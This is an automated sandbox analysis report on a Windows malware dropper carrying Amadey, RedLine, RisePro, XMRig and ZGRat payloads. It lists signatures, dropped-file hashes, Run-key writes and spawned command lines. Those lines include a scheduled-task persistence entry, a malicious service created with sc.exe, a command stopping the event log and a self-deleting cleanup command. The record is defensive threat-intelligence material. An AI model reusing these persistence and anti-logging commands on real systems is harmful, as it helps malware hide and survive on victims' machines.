Malware Analysis Report

2025-01-22 10:25

Sample ID 240124-evdwesaec6
Target ec2c94a21a52027c229a7824d4a1c5ca.bin
SHA256 3c2e54cf5340c3b1c1a013e1748db7359339eb1280d73f7f3278eab8c40f7b63
Tags
amadey redline risepro xmrig zgrat discovery evasion infostealer miner persistence rat spyware stealer trojan @pixelscloud @rlreborn cloud tg: @fatherofcarders) livetraffic
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

3c2e54cf5340c3b1c1a013e1748db7359339eb1280d73f7f3278eab8c40f7b63

Threat Level: Known bad

The file ec2c94a21a52027c229a7824d4a1c5ca.bin was found to be: Known bad.

Malicious Activity Summary

RedLine

RedLine payload

RisePro

xmrig

Amadey

Detect ZGRat V1

ZGRat

XMRig Miner payload

Modifies Windows Firewall

Creates new service(s)

Downloads MZ/PE file

Stops running service(s)

Blocklisted process makes network request

Checks BIOS information in registry

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Launches sc.exe

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

Suspicious use of FindShellTrayWindow

Suspicious behavior: CmdExeWriteProcessMemorySpam

Delays execution with timeout.exe

Suspicious use of SetWindowsHookEx

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-24 04:15

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-24 04:15

Reported

2024-01-24 04:18

Platform

win7-20231215-en

Max time kernel

139s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe"

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A (19 entries)

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A (8 entries)

RisePro

stealer risepro

ZGRat

rat zgrat

xmrig

miner xmrig

XMRig Miner payload

miner

Description Indicator Process Target
N/A N/A N/A N/A (11 entries)

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A (6 entries)
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe N/A
N/A N/A N/A N/A
N/A N/A C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A (4 entries)
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A (2 entries)
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A (4 entries)
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\num.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000564001\\num.exe" C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\rback.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000567001\\rback.exe" C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A

Checks installed software on the system

discovery

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A (13 entries)
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A (12 entries)

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A (4 entries)

Enumerates physical storage devices

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe N/A (5 entries)
N/A N/A C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe N/A (2 entries)
N/A N/A C:\Windows\system32\conhost.exe N/A (4 entries)
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A (30 entries)
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A (21 entries)

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A (3 entries)
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A (3 entries)
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A (6 entries)
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A (2 entries)
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A (6 entries)
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A (6 entries)
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A (12 entries)
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1588 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe (4 entries)
PID 2784 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\schtasks.exe (4 entries)
PID 2784 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe (4 entries)
PID 2784 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe (4 entries)
PID 2784 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe (4 entries)
PID 2580 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe C:\Windows\system32\cmd.exe (4 entries)
PID 2784 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe (4 entries)
PID 1732 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com (3 entries)
PID 1732 wrote to memory of 1744 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe (3 entries)
PID 2784 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe (4 entries)
PID 1732 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe (3 entries)
PID 2784 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe (4 entries)
PID 1732 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe (3 entries)
PID 1732 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe (3 entries)
PID 1732 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe (3 entries)
PID 1732 wrote to memory of 924 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe (3 entries)
PID 1732 wrote to memory of 1980 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe (3 entries)
PID 1732 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe (3 entries)
PID 1732 wrote to memory of 1632 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe

"C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe"

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe

"C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe"

C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe

"C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe"

C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe

"C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe"

C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe

"C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p4632370330209207692137030328 -oextracted

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

"C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_9.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_8.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe

"C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "xfAk7rC2FeEN35Y8o.exe"

C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe

"xfAk7rC2FeEN35Y8o.exe"

C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe

"C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "FLWCUERA"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "FLWCUERA"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

conhost.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {26E75C87-5A32-40B2-A05C-DB3831445712} S-1-5-21-3427588347-1492276948-3422228430-1000:QVMRJQQO\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe

"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

Network

Files


\Users\Admin\AppData\Local\Temp\1000567001\rback.exe

MD5 73102c5b3abea202c716dc000639501f
SHA1 9f25b23dc8c3132f707490b747bdc110aa0a1bf4
SHA256 47ead837fbf7d50b81ee8cde52fc82fe07134b3a522e1ca5fe80f0c9ff55df30
SHA512 90e999b71ae0aa7ac6cf7488ace95d571ec57360cfdd8d889c467945f908272204e276c167ff4621f14e3d22d3366d482d3cb962f1d3a7261a822e77b2a59163

memory/2784-48-0x0000000004730000-0x0000000004C13000-memory.dmp

memory/1728-49-0x0000000001120000-0x0000000001603000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe

MD5 d177caf6762f5eb7e63e33d19c854089
SHA1 f25cf817e3272302c2b319cedf075cb69e8c1670
SHA256 4296e28124f0def71c811d4b21284c5d4e1a068484db03aeae56f536c89976c0
SHA512 9d0e67e35dac6ad8222e7c391f75dee4e28f69c29714905b36a63cf5c067d31840aaf30e79cfc7b56187dc9817a870652113655bec465c1995d2a49aa276de25

memory/2552-72-0x0000000001E90000-0x0000000001ED2000-memory.dmp

memory/2552-86-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/2552-98-0x0000000004830000-0x0000000004870000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 4b3a5b96f9eedd8626a8c12976765b56
SHA1 85307e380d233c8229f9e0de16ed82821221a0be
SHA256 1651b6ed815b2128c2362ad38a7cfcdafc6c5f8705572626c872ad788c41f6ef
SHA512 b274c74ebf059fa203408a120a2c6f54f769d93d34d916aad9b4f712455b3ffe396e325744d2488a090dafb1c4621f83428719c8fe20d93b10904953dcdc8790

memory/2140-101-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/2552-102-0x0000000004830000-0x0000000004870000-memory.dmp

memory/2140-103-0x00000000048C0000-0x0000000004900000-memory.dmp

memory/2552-104-0x0000000004830000-0x0000000004870000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 5adb0fa82d102152c869f831bdf2ad89
SHA1 bba32248250524ba6ef6dd499462ddc02e2bc720
SHA256 2055429dc5a7506e14e3fc328a278c61992147ed12a368243f1a5e5535f7a327
SHA512 e20d652ff39c95ca34c8ad6378e15b24853f23ad34c1e610eead1bee39f0aaef1187abc120e9b3a96e16b58ec38d929d71e220e17ad968f8c8f7a5f328cb9681

\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

MD5 2fadc3984b71f0fd08c832adeedf2b52
SHA1 cc1fc06a55af72364fb0a1266d3f5936577162f9
SHA256 34f47e63788cdb398c48ad06f3878ec9bce9fd0e261306b2c81b3796925f9240
SHA512 63e8127e2d44cd98cd6225eb8d1f348f5e3e7d7f86900e2f949329f6d35a943147aa1fb72061a8868cfcd9e53fde536dc870b3a9c9248b6aab067774b1654685

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

MD5 5eca966dd56f0189904b8240878cba81
SHA1 770520d011c21409b93a77bf45fc858ccaaaa8af
SHA256 b09dd6fd6cb440cd5263f442082effb1089961d2c1ff86dd5cc5e47e78aa350e
SHA512 99cdf082fe098418a33eeba18799b6ccf22e08de99cab546f0add72d941fec7363c0a8d073283369c7cbd66d67ebdb0803215d19944aa30db576d467a65c2953

memory/2784-133-0x00000000001D0000-0x00000000005D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_9.zip

MD5 40235b44032f0152340cf8abf962b5cc
SHA1 a47551c300cb4491e9dc82734466d243e8eee584
SHA256 3a424ab07ae35d2f8ecee2b7117b477b092c429d49323eba29ba0afe15a1ad22
SHA512 82fdf657ba3c6be68d266218c15c58b2fb758d82241e86459f0a30e6c2bb4728a62f2c14a1a52df79c118cf2c9e6e19690e5f8a408acf5cf9a4455cd7145eaf3

\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 931afc729d4dc9c815f25a6e71605882
SHA1 cb03ffc5bdfad24ea2f85bc72302b8b518b8c841
SHA256 e6610aee9c7eccfd728c524ef30047f1fff02f5023e80a6f7f0dc41a9642dbff
SHA512 7071d8d9ed5c8a63ac4cbbc16ee53417b4e2c8fb5007f901e5d538f43859d343816758d22e96a9ef3d3e22318206068cdca1a213be77da8d382bde0d851622ad

memory/1808-134-0x00000000737B0000-0x0000000073E9E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

MD5 219bbf6cbe4a20ce93e50137a47c9be3
SHA1 25d68c1f11d5624bcc94e5bf9d382fad55d3058f
SHA256 47d7c430478b2cc240f9077f22051146c30412868ada9289c819c9ec16c612ae
SHA512 17df2bd3a6d83f91690ec806056b34a9860216c259a16c7e7cfcc1a8f7ce823e5e58474b4ae38b876fb0f5ec8f338f819e69276fb63b635b757e26351127ba1a

memory/1808-131-0x0000000000990000-0x0000000000A9A000-memory.dmp

memory/2784-125-0x00000000001D0000-0x00000000005D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe

MD5 3c9da20ad78d24df53b661b7129959e0
SHA1 e7956e819cc1d2abafb2228a10cf22b9391fb611
SHA256 2fd37ed834b6cd3747f1017ee09b3f97170245f59f9f2ed37c15b62580623319
SHA512 1a02da1652a2c00df33eceda0706adebb5a5f1c3c05e30a09857c94d2fbb93e570f768af5d6648d3a5d11eea3b5c4b1ceb9393fc05248f1eefd96e17f3bbe1b4

memory/2156-161-0x0000000001300000-0x000000000136C000-memory.dmp

memory/2156-157-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/2140-164-0x00000000048C0000-0x0000000004900000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 1b7c22a214949975556626d7217e9a39
SHA1 d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512 ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

memory/2156-174-0x0000000004E50000-0x0000000004E90000-memory.dmp

memory/2552-165-0x0000000004830000-0x0000000004870000-memory.dmp

memory/1808-163-0x00000000005E0000-0x0000000000620000-memory.dmp

memory/2552-151-0x0000000002120000-0x000000000215E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_8.zip

MD5 aaa97cae61f10770ab65892fb10b827d
SHA1 0f5f5b27b4603a2a9a6d778263ca402d22fc964f
SHA256 96767258e636d6cd1334d3ca67a1d9f483a090a78d9bafbd3a7bc8837ec998c3
SHA512 dde8270e6699050ce428bfb442d95089b97ad2c351efe9d5d9898a4cd0ded3f5e88f22572a6aecb72a0250b4f3f76ddf933f9853f5761d5676719c886d15d295

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

MD5 11f1ca0c43391dc92905d9f728428e68
SHA1 2287377b147573503e20abd97330a681eca88b9d
SHA256 704255efb181a254b7ee6da512ea67db6243881c8dfddd520337d1a3aa4ee9b5
SHA512 14ef19ebb5eb017edeb203f263c4f64f9f58adb5715ce11dab258ff09b51bcdf072cc9678ca110fcc0cf4e43f9c64726d0b719b95408b2c321c1bb5baf8cc62c

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

MD5 29d5a47c9a1eccdbd25c49cd540f742f
SHA1 81332aed09c142f8ee235c0303c9cae2466a96f3
SHA256 bd48f756c7c1d7883b2ae5934260ce04b08e488108ca75953a8e8fe9ee89770c
SHA512 051039bc5e23fdc0273c7f6e78655c285de84f2b64358af857d5a25d9df01515fedd5ec0f91c7e8d9a8faf00c9a2412d3b0c322a4110ce335fae4abd6fecd089

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

MD5 fe835c127049c665c997e7bf7b5b85f5
SHA1 fe1b418c2b5eca8f800db39a3740b276c95a41ea
SHA256 620d0bb3e2f0f8ac7e96623f89842433a4bea299f9d8c8481fba868ba15f8930
SHA512 284244c3887ce3f10d387c56e59969f763de33517f36c2393e4bee56fb91306f3e0c5b2e162f37c07b490e6a354e57edd71b31317509191eaa4879140c08a680

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

MD5 781e90fd2d92487c572cb80b35067285
SHA1 0b436e2afdd1cc954ddc86b22500540624d0e598
SHA256 037ecc54896d74db57489337f7ffff292ad7f8e650833689efc763293e0ae6f1
SHA512 13f47e023297520eb0a0f3aff657158d91c92cb770ed706ad73b95e087bec22e0475e28f427af853c2786b9b2fa8cb7f2fa06ccde847f3f3e32d93d7fe10685a

memory/2784-215-0x0000000004730000-0x0000000004C13000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

MD5 eb8ae67add0315dd587f99d81e0f53f7
SHA1 8d2e1afc03e3549775065f541417778eea6c3e6e
SHA256 95379f57e916b94e093e3bef9f4a7d92869951b6c369c5801fedd48a72b5efde
SHA512 4485773f12fcb34a1fed8e9b764c98e629239e51d99623deba17c237e59d1ad23ad2d755cd0917cb6789b0c52471c9b21f8c0ff2898c8e74ea0b577930d2079a

\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 e27ed9139b5deae4b799ef17880eb82f
SHA1 210f8087ce88aeb5eb0cdd8a7992adbd3cb35e1e
SHA256 b293901df19277cd5908ea67aa9503839631ae19f312eaf378296f0642f18ead
